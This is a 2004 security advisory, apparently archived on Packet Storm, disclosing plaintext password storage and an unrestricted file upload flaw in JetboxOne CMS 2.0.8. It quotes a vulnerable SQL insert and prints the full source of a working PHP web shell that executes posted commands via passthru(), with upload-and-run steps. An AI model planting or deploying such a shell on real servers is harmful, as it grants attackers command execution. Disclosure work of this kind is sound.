what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Echo Security Advisory 2004.3

Echo Security Advisory 2004.3
Posted Aug 5, 2004
Authored by y3dips, Echo Security | Site y3dips.echo.or.id

JetboxOne CMS version 2.0.8 keeps system passwords in an unencrypted state and also has a remote code execution flaw.

tags | advisory, remote, code execution
SHA-256 | b1e5dc4defffff99c27ff9d8f7a58a28058aa20c7886e2691265f0547b90ded7

Echo Security Advisory 2004.3

Change Mirror Download


ECHO_ADV_03$2004

---------------------------------------------------------------------------
vulnerabilities in JetboxOne CMS
---------------------------------------------------------------------------

Author: y3dips
Date: August, 4th 2004
Location: Indonesia, Jakarta
Web: http://echo.or.id/adv/adv03-y3dips-2004.txt

---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Jetboxone is a freeware content management system, written in php by Arjen.

download at : http://www.sourceforge.net/projects/jetboxone

Version :
tested on jetbox v2.0.8
not tested on other/older version but it is possible be the same

---------------------------------------------------------------------------

Vulnerabilities:
~~~~~~~~~~~~~~~~

A. Unencrypted Password input in database table of user(Admin) and web user :

all password that store in database was not encrypted, it means that attacker
who could attack the database are possible to look all account and all password
without do anything to crack it

it prove in :

/admin/cms/useradmin.inc.php > file for created admin and author

$sql="INSERT INTO user (login, user_password, email, type, display_name) VALUES ('$_REQUEST[uname]','$_REQUEST[password1]','$_REQUEST[email]',\
'$_REQUEST[usertype]','$_REQUEST[fullname]')";
mysql_prefix_query($sql) or die (mysql_error());
$newuid = mysql_insert_id();

$_REQUEST[password1] <--- no encryption process,
or if u dont believe, you just see in your database ,

drive trough to your database from console ,

mysql> use jet[or your db name]

mysql> SELECT * FROM `user` ;

+-----+---------+--------+---------------+------------------------+---------------+---------------+-------+----------------+
| uid | session | login | user_password | email | type | display_name | visit | history |
+-----+---------+--------+---------------+------------------------+---------------+---------------+-------+----------------+
| 1 | NULL | admin | admin1 | a.schat@streamedge.com | administrator | Administrator | 1104 | 20040803215054 |
| 2 | NULL | dudul | carnage | dudul@dudul.com | user | dudul | 7 | 20040803223734 |
| 3 | NULL | y3dips | ganteng | y3dips@ganteng.com | administrator | y3dips | NULL | 20040803203157 |
+-----+---------+--------+---------------+------------------------+---------------+---------------+-------+----------------+
4 rows in set (0.11 sec)

also for webuser (standard user)

command :

mysql> SELECT * FROM `webuser` ;



B. Remote Execution shell

it is possible for "Standard user" that have right as "Author" in "IMAGES"
modules to upload malicious file (php shell :P) , because there isn`t filterring
input file to uploads, so itis possible to execute malicious code, in this case
i proof it with php code (use passthru() to execute shell command )

make some php code, and upload it in images upload box :
this is my simple code :

you can find it in mysites http://geocities.com/y3d1ps/scarpt/echo-simple-shell.php.txt

---------------code-------------------


<!-- simple php shell made by y3dips (echo.or.id) for test only-->
<html>
<head>
<title>#E-C-H-O $imple $hell</title>
</head>
<BODY bgcolor="#000000">
<table>
<tr><td bgcolor=#cccccc>
<?
if ((!$_POST['cmd']) || ($_POST['cmd']=="")) { $_POST['cmd']="ls -la ; pwd ;id "; }
echo "<b>";
echo "<div align=left><textarea name=report cols=70 rows=15>";
echo "".passthru($_POST['cmd'])."";
echo "</textarea></div>";
echo "</b>";
?>
</td></tr></table>
<table>
<tr><td height=18>
<?
echo "<form name=command method=post>";
echo "<font face=Verdana size=1 color=red>";
echo "<b> [echo]$ </b>&nbsp;&nbsp;";
echo "<input type=text name=cmd size=45>&nbsp;&nbsp;";
echo "<input type=submit name=submit value=\"0k\">";
echo "</font>";
echo "</form>";
?>
</td></tr></table>

---------------eof code------------------

save it as cmd.php

and then click "show" BUM you have a shell with nobody access (APACHE/HTTPD)
"there you go"

---------------------------------------------------------------------------

The fix:
~~~~~~~~

Vendor not contacted yet
but i ll post it to them later

---------------------------------------------------------------------------

Shoutz:
~~~~~~~

~ echo|staff (m0by, the_day, comex, z3r0byt3, K-159, c-a-s-e, S`to)
~ newbie_hacker@yahoogroups.com ,
~ #e-c-h-o@DALNET

---------------------------------------------------------------------------

Contact:
~~~~~~~~

y3dips || echo|staff || y3dips[at]phreaker[dot]net
Homepage: http://y3dips.echo.or.id/

------------------------------- [ EOF ] -----------------------------------
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    23 Files
  • 25
    Apr 25th
    16 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close